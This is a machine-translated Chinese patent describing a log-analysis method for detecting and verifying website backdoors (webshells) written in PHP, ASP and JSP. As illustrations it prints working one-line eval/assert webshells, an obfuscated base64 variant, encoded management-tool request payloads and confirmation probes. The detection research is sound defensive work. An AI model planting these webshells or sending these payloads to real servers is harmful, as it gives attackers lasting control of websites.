CN107104924A - The verification method and device of website backdoor file - Google Patents
The verification method and device of website backdoor file Download PDFInfo
- Publication number
- CN107104924A CN107104924A CN201610096648.2A CN201610096648A CN107104924A CN 107104924 A CN107104924 A CN 107104924A CN 201610096648 A CN201610096648 A CN 201610096648A CN 107104924 A CN107104924 A CN 107104924A
- Authority
- CN
- China
- Prior art keywords
- verified
- file
- internet access
- record
- access request
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/08—Network architectures or network communication protocols for network security for authentication of entities
- H04L63/083—Network architectures or network communication protocols for network security for authentication of entities using passwords
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Information Transfer Between Computers (AREA)
Abstract
The invention discloses a kind of verification method and device of website backdoor file.Wherein, this method includes:Obtain network access log recording;The communication protocol used according to access website backdoor file is analyzed network access log recording, chooses internet access request record to be verified;Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;Verify that internet access to be verified asks whether the file of record access is website backdoor file by the verification mode of selection.The mode accuracy that website backdoor file is determined by way of characteristic matching that the present invention is solved employed in correlation technique is relatively low, is also easy to produce the technical problem failed to report or reported by mistake.
Description
Technical field
The present invention relates to internet arena, in particular to a kind of verification method and device of website backdoor file.
Background technology
Webshell is website backdoor file, and " Web ", which is meant that, needs Website server open Web service, " shell "
It is meant that the operating right for obtaining Website server to a certain extent.Webshell is with ASP, PHP, JSP or CGI etc.
A kind of order performing environment that web page files form is present, generally using being write with Website server identical programming language
Into being arranged in directory web site.Webshell is run from the arbitrary parameter of visitor's reception and in being added to native codes, then
Operation result is returned into visitor again.Therefore, hacker is after a website is invaded, it will usually by Webshell and website service
Normal web page files mix under device Web catalogues, just can use browser to access Webshell, to reach long-term control
The purpose of Website server processed, wherein it is possible to include but is not limited to:Upload/download file, checks database, performs any journey
Sequence order.Because programming language is versatile and flexible, new Webshell has lost static back door feature substantially, so as to light
Ground bypasses the detection of back door identification facility.
Webshell management tools are communicated using special communication protocol with website backdoor file, so as to realize disk
The functions such as catalogue browsing, file upload or download, execution system order, its main realization principle is:Uploaded in website
Above-mentioned functions are converted into dynamic generation by one Webshell that can be accessed by Webshell management tools, Webshell management tools
The code and form arranged with communication protocol is packaged, Webshell is sent in the way of accessing webpage by Content of Communication.
Webshell is packaged after operation state code according to same communication protocol to operation result, then return again to
Webshell management tools.Although the content communicated every time can have differences because of the difference of function, communication protocol is limited to
Defect, communication every time always has partial content and meets certain feature.
Most hacker can select to use Webshell management tools pair after Webshell files are uploaded
Webshell conducts interviews.Therefore, most of Webshell can have been associated with the access record of Webshell management tools
Come.Although website backdoor file is ever-changing, the communication protocol in Webshell management tools that hacker commonly uses is constant.
Website back door detection method employed in correlation technique is to detect work by installing back door on Website server
Tool, by being confirmed whether to have backdoor file to site file progress back door mark scanning.Work is detected at these website back doors
It is essentially all, using Static Analysis Technology and sandbox dynamic debugging, syntax parsing to be carried out to code, constructs and holds in tool
Row flow, then detects calling for dangerous function, whether finally draw code is website back door by way of simulating and performing
As a result.
However, the drawbacks of this detection mode has very big:First, the programming language that website back door is used is varied
, its unfixed file format adds the complexity of back door feature detection;Secondly, feature detection depends on file characteristic
, often there is a kind of new backdoor file and is required for updating file characteristic library, feature database thus can be caused to consume excessive storage in storehouse
Space;Then, website back door can all disguise oneself as oneself the normal web page files of website, easily to occur in detection process certain
Quantity being failed to report or reports by mistake.
Moreover, programming language used in most of Website servers all supports the generation and operation of dynamic code,
" a word wooden horse " backdoor file all the fashion at present just make use of this characteristic well, realize the encryption of code with mixing
Confuse.This " a word wooden horse " backdoor file has lost conventional website back door feature completely, so as to easily around
Cross file characteristic detection.
Therefore, the peace that hacker is had found by webmaster in order to avoid website backdoor file or configured by Website server
Full software detection is arrived, and generally can all be selected " a word wooden horse " as backdoor file, is inserted into the normal webpage of Website server
In file;Meanwhile, rear gate code is encrypted or obscured, does not seem website to cause backdoor file to get up on the surface
The backdoor file of server.
Here is the example code of common " a word wooden horse " backdoor file, and its specific manifestation form is as follows:
<php
@eval($_POST['c']);
>
It will be clear that there is obvious " a word wooden horse " backdoor file spy in the code from above-mentioned code
Levy, visitor to the incoming arbitrary code of eval functions and can perform, so eval is a dangerous function call, based on text
The back door detection instrument of part feature can find such website backdoor file.
However, for gate code after a word wooden horse shown below:
<php
$ c=$ _ POST [' c'];
assert($c);
>
In the rear gate code despite the presence of assert this dangerous function call, but because variable " c " can not be confirmed
Source, be mostly based on the back door detection instrument of file characteristic to the Detection results of such Webshell backdoor files in fact simultaneously
It is undesirable.
In addition, gate code is as follows after a word wooden horse that base64 is encoded:
<php
Eval (gzuncompress (base64_decode (' eJxTiQ/wDw6JVk9Wjw ... UAEwkDMw=
=')));
>
Above-mentioned rear gate code is by base64 codings and gzcompress compressions, and not any back door is special on the surface
Levy, and gate code after just being restored only in actual moving process, therefore, conventional back door detect instrument to such website
The detection of backdoor file is also helpless.
For it is above-mentioned the problem of, effective solution is not yet proposed at present.
The content of the invention
The embodiments of the invention provide a kind of verification method and device of website backdoor file, at least to solve correlation technique
Employed in the mode accuracy that website backdoor file is determined by way of characteristic matching it is relatively low, be also easy to produce and fail to report or report by mistake
Technical problem.
One side according to embodiments of the present invention there is provided a kind of verification method of website backdoor file, including:
Obtain network access log recording;The communication protocol used according to access website backdoor file is to network access day
Will record is analyzed, and chooses internet access request record to be verified;Record is asked according to internet access to be verified
The request type belonged to chooses verification mode;Verify that record is asked in internet access to be verified by the verification mode of selection
The file of access is website backdoor file.
Alternatively, the communication protocol used according to access website backdoor file is divided network access log recording
Analysis, choosing internet access request record to be verified includes:Using communication protocol to including in network access log recording
Whole internet access request records carry out piecewise analytic one by one;It will include in request body content after parsing behind website
The internet access request record of the fixed field set in code segment and/or communication protocol that door file is performed is defined as to be tested
The internet access request record of card.
Alternatively, verification mode bag is chosen according to the belonged to request type of internet access request record to be verified
Include:URL (URL) is extracted from the request row of internet access request record to be verified;According to URL bags
The suffix portion content contained determines request type;According to request type checking is chosen for internet access request record to be verified
Mode.
Alternatively, verify that internet access to be verified asks whether the file of record access is website by verification mode
Backdoor file includes:Extract to access from internet access request record to be verified and connect password used in respective file;
In the case where request type is PHP types or ASP types, searched from internet access request record to be verified with being connected
The corresponding executable code section of password;Executable code section is run according to default calculation, operation result is generated;
When operation result is consistent with default result, determine the file of internet access request record access to be verified for behind website
Door file.
Alternatively, verify that internet access to be verified asks whether the file of record access is website by verification mode
Backdoor file includes:Extract to access from internet access request record to be verified and connect password used in respective file;
In the case where request type is JSP types, searched from internet access request record to be verified corresponding with connection password
Executable code section;According to the executable code section of specified command function operation, generation shows result;Work as display
When as a result meeting the functional characteristic of command function, determine the file of internet access request record access to be verified for behind website
Door file.
Another aspect according to embodiments of the present invention, additionally provides a kind of checking device of website backdoor file, including:
Acquisition module, for obtaining as the network access log recording produced by outside access server;Analysis module, is used
Network access log recording is analyzed in the communication protocol used according to access website backdoor file, chosen to be verified
Internet access request record;Module is chosen, for according to the belonged to request class of internet access request record to be verified
Type chooses verification mode;Authentication module, verifies that internet access to be verified asks to record for the verification mode by selection
Whether the file of access is website backdoor file.
Alternatively, analysis module includes:Resolution unit, for using communication protocol to being included in network access log recording
Whole internet access request record carry out piecewise analytic one by one;First determining unit, for by the request body after parsing
The internet for including the code segment performed by website backdoor file and/or the fixed field set in communication protocol in content is visited
Ask that request record is defined as internet access request record to be verified.
Alternatively, choosing module includes:First extraction unit, for asking from internet access request record to be verified
Ask in row and extract URL;Second determining unit, the suffix portion content for being included according to URL determines request type;Choose single
Member, for choosing verification mode according to request type for internet access request record to be verified.
Alternatively, authentication module includes:Second extraction unit, for being carried from internet access request record to be verified
Take connection password used in access respective file;Searching unit, in the feelings that request type is PHP types or ASP types
Under condition, executable code section corresponding with connection password is searched from internet access request record to be verified;Generation
Unit, for running executable code section according to default calculation, generates operation result;3rd determining unit, is used for
When operation result is consistent with default result, determine the file of internet access request record access to be verified for behind website
Door file.
Alternatively, authentication module includes:Second extraction unit, for being carried from internet access request record to be verified
Take connection password used in access respective file;Searching unit, in the case of being JSP types in request type, from treating
Executable code section corresponding with connection password is searched in the internet access request record of checking;Generation unit, is used for
According to the executable code section of specified command function operation, generation shows result;3rd determining unit, for when display knot
When fruit meets the functional characteristic of command function, the file for determining internet access request record access to be verified is website back door
File.
In embodiments of the present invention, it is not necessary to characteristic matching is carried out to backdoor file, but is used according to behind access website
Door file using communication protocol the network access log recording retained on server is analyzed by the way of choose to be tested
The internet access request record of card, and chosen according to the belonged to request type of internet access request record to be verified
Verification mode confirm network backdoor file whether necessary being, so as to be effectively improved what website backdoor file was identified
Success rate, significantly reduces the probability to failing to report or reporting by mistake in website backdoor file progress verification process, and then solve
Mode accuracy that website backdoor file is determined by way of characteristic matching employed in correlation technique is relatively low, is also easy to produce
The technical problem failed to report or reported by mistake.
Brief description of the drawings
Accompanying drawing described herein is used for providing a further understanding of the present invention, constitutes the part of the application, this hair
Bright schematic description and description is used to explain the present invention, does not constitute inappropriate limitation of the present invention.In the accompanying drawings:
Fig. 1 is a kind of hardware configuration frame of the terminal of the verification method of website backdoor file of the embodiment of the present invention
Figure;
Fig. 2 is the flow chart of the verification method of website backdoor file according to embodiments of the present invention;
Fig. 3 is the structured flowchart of the checking device of website backdoor file according to embodiments of the present invention;
Fig. 4 is the structured flowchart of the checking device of website backdoor file according to the preferred embodiment of the invention;
Fig. 5 is a kind of structured flowchart of terminal according to embodiments of the present invention.
Embodiment
In order that those skilled in the art more fully understand the present invention program, below in conjunction with the embodiment of the present invention
Accompanying drawing, the technical scheme in the embodiment of the present invention is clearly and completely described, it is clear that described embodiment is only
The embodiment of a part of the invention, rather than whole embodiments.Based on the embodiment in the present invention, ordinary skill people
The every other embodiment that member is obtained under the premise of creative work is not made, should all belong to the model that the present invention is protected
Enclose.
It should be noted that term " first " in description and claims of this specification and above-mentioned accompanying drawing, "
Two " etc. be for distinguishing similar object, without for describing specific order or precedence.It should be appreciated that so using
Data can exchange in the appropriate case, so as to embodiments of the invention described herein can with except illustrating herein or
Order beyond those of description is implemented.In addition, term " comprising " and " having " and their any deformation, it is intended that cover
Lid is non-exclusive to be included, for example, the process, method, system, product or the equipment that contain series of steps or unit are not necessarily limited to
Those steps or unit clearly listed, but may include not list clearly or for these processes, method, product
Or the intrinsic other steps of equipment or unit.
Embodiment 1
According to embodiments of the present invention, additionally provide a kind of embodiment of the method for the verification method of website backdoor file, it is necessary to
Illustrate, can be in the computer system of such as one group computer executable instructions the step of the flow of accompanying drawing is illustrated
Perform, and, although logical order is shown in flow charts, but in some cases, can be with suitable different from herein
Sequence performs shown or described step.
The embodiment of the method that the embodiment of the present application one is provided can be in mobile terminal, terminal or similar fortune
Calculate in device and perform.Exemplified by running on computer terminals, Fig. 1 is a kind of testing for website backdoor file of the embodiment of the present invention
The hardware block diagram of the terminal of card method.As shown in figure 1, terminal 10 can include one or more (figures
In only show one) (processor 102 can include but is not limited to Micro-processor MCV or PLD to processor 102
FPGA etc. processing unit), the memory 104 for data storage and the transmitting device 106 for communication function.Ability
Domain those of ordinary skill is appreciated that the structure shown in Fig. 1 is only signal, and it does not cause limit to the structure of above-mentioned electronic installation
It is fixed.For example, terminal 10 may also include than shown in Fig. 1 more either less components or with shown in Fig. 1 not
Same configuration.
The website that memory 104 can be used in the software program and module of storage application software, such as embodiment of the present invention
Corresponding programmed instruction/the module of verification method of backdoor file, processor 102 is stored in soft in memory 104 by operation
Part program and module, so as to perform various function application and data processing, that is, realize testing for above-mentioned website backdoor file
Card method.Memory 104 may include high speed random access memory, may also include nonvolatile memory, such as one or more magnetic
Property storage device, flash memory or other non-volatile solid state memories.In some instances, memory 104 can further comprise
The memory remotely located relative to processor 102, these remote memories can pass through network connection to terminal 10.
The example of above-mentioned network includes but is not limited to internet, intranet, LAN, mobile radio communication and combinations thereof.
Transmitting device 106 is used to data are received or sent via a network.Above-mentioned network instantiation may include
The wireless network that the communication providerses of terminal 10 are provided.In an example, transmitting device 106 is fitted including a network
Orchestration (Network Interface Controller, NIC), its can be connected by base station with other network equipments so as to
Internet is communicated.In an example, transmitting device 106 can be radio frequency (Radio Frequency, RF) module, its
For wirelessly being communicated with internet.
Under above-mentioned running environment, this application provides the verification method of website backdoor file as shown in Figure 2.Fig. 2 is
The flow chart of the verification method of website backdoor file according to embodiments of the present invention.This method includes following process step:
Step S202:Network access log recording is obtained, wherein, network access log recording can be by external client
(for example:Personal computer) access home server and generate, naturally it is also possible to accessed by outside mobile terminal or other equipment
Home server and generate;
Step S204:The communication protocol used according to access website backdoor file is divided network access log recording
Analysis, chooses internet access request record to be verified;For example:Using the mode of identification Webshell communication protocols, in service
The record that hacker accesses Webshell is found out in device daily record;
Step S206:Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;
Step S208:The file of internet access request record access to be verified is verified by the verification mode of selection is
No is website backdoor file.
Back door detection scheme provided in correlation technique can only search the feature in static code, or by grammer point
Simulate and perform after analysis, but real code reverse can not all be come out, also None- identified goes out the real behavior of program.Using this hair
The technical scheme that bright embodiment is provided, it is not necessary to characteristic matching is carried out to backdoor file, but is used according to behind access website
Door file using communication protocol the network access log recording retained on server is analyzed by the way of choose to be tested
The internet access request record of card, and chosen according to the belonged to request type of internet access request record to be verified
Verification mode confirm network backdoor file whether necessary being, it can not only recognize conventional website backdoor file and can also
The website backdoor file obscured is passed through in enough identification, so that the success rate that website backdoor file is identified is effectively improved,
The probability to failing to report or reporting by mistake in website backdoor file progress verification process is significantly reduced, and then solves related skill
The mode accuracy that website backdoor file is determined by way of characteristic matching employed in art is relatively low, is also easy to produce and fails to report or miss
The technical problem of report.
Alternatively, in step S204, the communication protocol used according to access website backdoor file is to network access day
Will record is analyzed, and is chosen internet access request record to be verified and be may comprise steps of:
Step S1:Using communication protocol to included in network access log recording whole internet access request record by
One carries out piecewise analytic;
Step S2:To include in request body content after parsing the code segment that is performed by website backdoor file and/or
The internet access request record of the fixed field set in communication protocol is defined as internet access request record to be verified.
Website backdoor file would generally leave the access number of the Webshell pages in the Web log recordings of Website server
Recorded according to being submitted with data.Also, website backdoor file is required for just performing specific order after external parameter is received, and
In order to ensure website back door can only be used by visitor, backdoor file usually there will be a unique connection password, and this
Connection password can be obtained by analyzing log content.The operation principle of Webshell management tools is essentially consisted in:Please in Web
The command parameter of coded treatment is inserted through in asking, wherein, first parameter is connection password, and back door text is then passed to again
Part.
The communication protocol of Webshell management tools is broadly divided into following three layers:
First layer is performs the function of PHP code, for example:Eval, assert etc.;
The second layer is the decoding functions that base64 is encoded, for example:base64_decode;
Third layer is the request body content mentioned in code after base64 coded treatments, i.e. above-mentioned steps S2,
It is also the part that the application needs to pay close attention to and parse.
Hacker is just stored in above-mentioned third layer after base64 coded treatments as the code performed desired by visitor
Code in.At present, the Webshell management tools of main flow all can in order to hide the killing that server security detects instrument
Selection is sought to improve in first layer or the second layer, and rear gate code is obscured with realizing.However, no matter which kind of change side used
Formula, the start-up portion of base64 codings is changeless under normal conditions, therefore, it can perform matching according to features described above
Operation.
In a Web request, user can be with self-defined many parameters, such as:URL (URL), user
Act on behalf of (User-Agent), be stored in the data (Cookie) on user local terminal, submit data (post_data) etc..This
A little controllable dots can be used for Transfer Parameters by Webshell management tools.Therefore, just can be with by using log analysis process
Determine whether the content of these controllable dots in each web log file meets the characteristics of communication protocol of Webshell management tools.Such as
Fruit meets the characteristics of communication protocol of Webshell management tools, then can be stored in the information such as the URL of this daily record, connection password
In database, further detection is waited.
Below by respectively with the internet access request, the internet access of ASP types request and JSP classes of PHP types
Above-mentioned log analysis process is described in further detail exemplified by the internet access request of type.
1. the internet access for PHP types is asked
Assuming that there is a webshell under the root hehe.php of targeted website, its content is as follows:
<php@eval($_POST[8]);>
This is common, relatively simple PHP types " a word wooden horse ".
The form of the normal access request sent by browser is specific as follows:
GET/hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
However, if the PHP type of access sent using Webshell management tools is asked, specific manifestation form is such as
Under:
POST/hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
8=@eval (base64_decode
(QGV2YWwBKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpOw));&z0=
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ
2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+
fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGP
T1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO3
1lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjs
kVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29u
dmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkU
CkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUj
T9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZG llKCk7&z1=
RDpcXHhhbXBwXFxodGRvY3NcXA==
Need to analyze the access request that above-mentioned use Webshell management tools are sent below:
First, the equal sign left-hand digit " 8 " occurred for the first time in POST contents is the password of the Webshell, its
$ _ POST [8] in correspondence code;That is, first is appeared in each access request sent by Webshell management tools
The content on the equal sign left side is the connection password of the Webshell.
Secondly, it is one section of PHP code that the content on the right of equal sign is appeared in for the first time, and its basic format is usually:@eval
(base64_decode(var1));Wherein, the content " var1 " inside innermost layer bracket by base64 it is encoded in
Hold, then decoding functions in the one layer of bracket in outside, and it is outermost, it is that PHP performs function;In addition, the content inside var1 is usual
For@eval (base64_decode ($ _ POST [z0]));
Finally, ";" content that occurs below may meet one or more variable z1-z5, these variables be required for through
Base64 encryptions are crossed, and can then show some PHP codes after the decryption.
Based on above-mentioned analysis, the log analysis process that the embodiment of the present invention is provided needs to complete following work:
(1) Webshell connection code extraction is come out in the access request sent from Webshell management tools.
(2) in@eval (base64_decode (var1)) var1 of innermost layer be in some cases it is discontinuous,
Its difficulty of matching is larger, but the content in base64 usually requires the action of correspondence " receiving follow-up variable " (for example:Receive
z0).And the mode received can only be " $ _ POST [z0] ", therefore it may only be necessary to match the corresponding base64 words of $ _ POST [z0]
Symbol string, substantially just it can be assumed that the access request is sent by Webshell management tools.But, it is contemplated that z0 is can be with
Change, therefore generally only match " $ _ POST [".
" $ _ POST [" is the fixed field set in the communication protocol mentioned in step S2 it should be noted that above-mentioned.
(3) performed above-mentioned match " result that $ _ POST [" operation is obtained be only the access request it is doubtful by
Webshell management tools are sent, and its reason is:$ _ POST [can may also be encrypted in regular traffic request.This
When, then the base64 contents in further matching z1-z5 are needed, necessarily occur that Webshell can be performed in content in this section
Code, for example:@set_magic_quotes_runtime(0);@set_time_limit (0), are only further being matched
It is a Webshell that this can be just further determined that after base64 contents in z1-z5.
It should be noted that what is occurred in above-mentioned z1-z5 necessarily occurs the code as step that Webshell can be performed
The code segment performed by website backdoor file mentioned in S2.
2. the internet access for ASP types is asked
Assuming that the ASP type of access sent using Webshell management tools is asked, its specific manifestation form is as follows:
Ysh=Execute (" Execute (" " On+Error+Resume+Next:Function+bd(byVal+s):For
+ i=1+To+Len (s)+Step+2:C=Mid (s, i, 2):If+IsNumeric(Mid(s,i,1))+Then:Execute
(" " " " bd=bd&chr (s &H " " " " &c& " " " ") " " " "):Else:Execute (" " " " bd=bd&chr (s &H " " " " &c&Mid
(s,i+2,2)&"""")""""):I=i+2:End+If""&chr(10)&""Next:End+Function:
Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""&bd(""""
44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E20464
4286474293A46443D596561722864742926222D223A4966204C656E284D6F6E74682864742929
3D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E74682
864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D46442622
30223A456E642049663A46443D464426446179286474292622202226466F726D6174446174655
4696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D3120546865
6E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E6
42046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E
672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C64657
2282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528
224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723
A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F
6E73652E577269746520462E4E616D6526636872283437292663687228392926464428462E446
174654C6173744D6F646966696564292663687228392926636872283438292663687228392926
432E476574466F6C64657228462E50617468292E6174747269627574657326636872283130293
A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E57
72697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696
5642926636872283929264C2E73697A652663687228392926432E47657446696C65284C2E5061
7468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):
Response.Write(""""|<-""""):Response.End " ") ") &z1=
663A5C5C7573725C5C4C6F63616C557365725C5C717877313539303936303432355C5C636F6E6
669675C5C
Based on above-mentioned analysis, the log analysis process that the embodiment of the present invention is provided needs to complete following work:
(1) it is identical with the processing mode of above-mentioned PHP type requests, in the access request sent from Webshell management tools
Webshell connection code extraction is come out.
(2) compared to PHP type requests, code before ASP type requests to obscure degree higher, its difficulty of matching compared with
Greatly, it therefore, it can omit the matching of the code section before ASP type requests.I.e. need not be by judging the request after parsing
The fixed field that sets whether is included in communication protocol in body matter to determine that record is asked in internet access to be verified.
(3) character string that there is equivalent length the center section of ASP type requests is encoded by hexadecimal (hex), wherein,
The function CreateObject (" Scripting.FileSystemObject ") that Webshell has to use is contained, i.e.,
" 4372656174654f626a6563742822536372697074696e672e46696c65 after hexadecimal code
53797374656d4f626a6563742229”.If can primarily determine that this is by the above-mentioned function of match hit
Individual Webshell.
It should be noted that what is occurred in above-mentioned z1-z5 necessarily occurs the code as step that Webshell can be performed
The code segment performed by website backdoor file mentioned in S2.
3. the internet access for JSP types is asked
Assuming that the JSP type of access sent using Webshell management tools is asked, its specific manifestation form is as follows:
Ch023=B&z0=UTF-8&z1=D:\\Install+Software\\tomcat7\\webapps\\cxzm\\
Based on above-mentioned analysis, the log analysis process that the embodiment of the present invention is provided needs to complete following work:
(1) it is identical with the processing mode of above-mentioned PHP type requests, in the access request sent from Webshell management tools
Webshell connection code extraction is come out.
(2) the uppercase implication on the right of the equal sign occurred for the first time in above-mentioned JSP type requests represents a behaviour
Make code name, can be represented from A-Z and perform different operations.And the z0 in JSP type requests is held essentially constant, because
This, can be used herein canonical matching=[A-Z] &z0=.
It should be noted that the internet access request for JSP types is usually only necessary to carry in execution above-mentioned steps S2
To on whether including the matching operation of fixed field set in communication protocol in the request body content after parsing.
Alternatively, in step S206, selected according to the request type that internet access request record to be verified is belonged to
Verification mode is taken to include following operation:
Step S3:URL is extracted from the request row of internet access request record to be verified;
Step S4:The suffix portion content included according to URL determines request type;
Step S5:According to request type verification mode is chosen for internet access request record to be verified.
For example:In the request row " POST/ of the PHP type of access request sent using Webshell management tools
In hehe.php HTTP/1.1 ", URL " hehe.php " can be extracted from the request row by parsing;Then, by this
URL suffix portion content " .php " can determine that this is the internet access request of a PHP type, it is possible thereby to further pin
The proof scheme of PHP types is chosen in internet access request to PHP types.
Alternatively, in step S208, verify that record access is asked in internet access to be verified by verification mode
Whether file is that website backdoor file may comprise steps of:
Step S6:Extract to access from internet access request record to be verified and connect close used in respective file
Code;
Step S7:In the case where request type is PHP types or ASP types, asked from internet access to be verified
Executable code section corresponding with connection password is searched in record;
Step S8:Executable code section is run according to default calculation, operation result is generated;
Step S9:When operation result is consistent with default result, determine that internet access request record to be verified is visited
The file asked is website backdoor file.
According to the characteristics of communication protocol for meeting Webshell management tools extracted during above-mentioned log analysis
URL, it must be just a backdoor file to be not meant to the corresponding site files of this URL, and its reason is:On current network
Scans web sites backdoor file can be actively removed in the presence of many hackers, and these scan requests also carry fixed URL addresses in itself,
The communication protocol of Webshell management tools can be also used to attempt to interact with file destination in these scan requests simultaneously,
Therefore, these scan requests are likely to meet the characteristics of communication protocol of part Webshell management tools, and then can be recognized
It is backdoor file to be set to.So, the presence of the behavior such as above-mentioned hacker's active scan website backdoor file is easily caused URL corresponding
Site file is that backdoor file has a large amount of wrong reports.
Accordingly, it would be desirable to take effective technological means to exclude because of behaviors such as above-mentioned hacker's active scan website backdoor files
Produced wrong report.In this regard, firstly, it is necessary to separately designing a set of back door authentication for the backdoor file of each programming language
Case;Secondly, the back door URL of the communication feature for meeting Webshell management tools obtained according to log analysis process suffix name
It is determined that using any specific proof scheme;Then, recycle connection password to verify backdoor file, and finally verify
Successful website back door URL just can definitely be regarded as the website backdoor file that there is currently.
1. for the internet access request of PHP types:
Because the content meeting being serviced device of the equal sign another side relative with connection password is directly performed, it therefore, it can first taste
Examination allows file to perform a simple calculations, then shows result.If the content returned by computing with it is expected that
As a result consistent, then it is Webshell to confirm this document.
Assuming that the access request of the PHP types sent using Webshell management tools is as follows:
POST/hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Executable code section corresponding with the connection password is searched by connecting password figure " 8 ", and according to as follows
The calculation generation operation result of setting:
8=die (md5 (233333));
If operation result return fb0b32aeafac4591c7ae6d5e58308344 and with expected result of calculation phase
Unanimously, then confirm to be proved to be successful, the internet access of the PHP types asks accessed file to be website backdoor file.
2. for the internet access request of ASP types:
It verifies that principle is identical with the checking principle of the access request of PSP types, that is, assumes to manage work using Webshell
The access request for having the ASP types sent is as follows:
POST/hehe.asp HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Executable code section corresponding with the connection password is searched by connecting password figure " 8 ", and according to as follows
The calculation generation operation result of setting:
8=response.write (654363512+3656342)
If operation result returns to 658019854 and consistent with expected result of calculation, confirmation is proved to be successful, should
The internet access of ASP types asks accessed file to be website backdoor file.
Alternatively, in step S208, verify that record access is asked in internet access to be verified by verification mode
Whether file is that website backdoor file can include following operation:
Step S10:Extract to access from internet access request record to be verified and connect close used in respective file
Code;
Step S11:In the case where request type is JSP types, looked into from internet access request record to be verified
Look for executable code section corresponding with connection password;
Step S12:According to the executable code section of specified command function operation, generation shows result;
Step S13:When showing that result meets the functional characteristic of command function, internet access request to be verified is determined
The file of record access is website backdoor file.
For the internet access request of JSP types:
The code in POST contents can not be directly performed due to JSP wooden horses, and a small amount of preset instructions can only be performed, because
This, can attempt to perform " row catalogue " operation, i.e.,:Assuming that the access of the JSP types sent using Webshell management tools please
Ask as follows:
POST/hehe.jsp HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Executable code section corresponding with the connection password is searched by connecting password figure " 8 ", and according to as follows
The function command generation of setting shows result:
8=A&z0=UTF-8
If carried in the display result returned " |<- " and "->| ", then show currently to perform is " row catalogue " operation,
It is proved to be successful, the internet access of the JSP types asks accessed file to be website backdoor file.
It should be noted that for foregoing each method embodiment, in order to be briefly described, therefore it is all expressed as a series of
Combination of actions, but those skilled in the art should know, the present invention is not limited by described sequence of movement because
According to the present invention, some steps can be carried out sequentially or simultaneously using other.Secondly, those skilled in the art should also know
Know, embodiment described in this description belongs to preferred embodiment, involved action and module is not necessarily of the invention
It is necessary.
Through the above description of the embodiments, those skilled in the art can be understood that according to above-mentioned implementation
The verification method of the website backdoor file of example can add the mode of required general hardware platform to realize by software, also may be used certainly
With by hardware, but the former is more preferably embodiment in many cases.Understood based on such, technical scheme sheet
The part contributed in other words to prior art in matter can be embodied in the form of software product, computer software production
Product are stored in a storage medium (such as ROM/RAM, magnetic disc, CD), including some instructions are to cause a station terminal equipment
(can be mobile phone, computer, server, or network equipment etc.) performs the method described in each embodiment of the invention.
Embodiment 2
According to embodiments of the present invention, a kind of checking device for being used to implement above-mentioned website backdoor file, such as Fig. 3 are additionally provided
Shown, the device includes:Acquisition module 10, for obtaining network access log recording;Analysis module 20, for according to access net
The communication protocol that backdoor file of standing is used is analyzed network access log recording, and choosing internet access to be verified please
Seek record;Module 30 is chosen, is verified for being chosen according to the belonged to request type of internet access request record to be verified
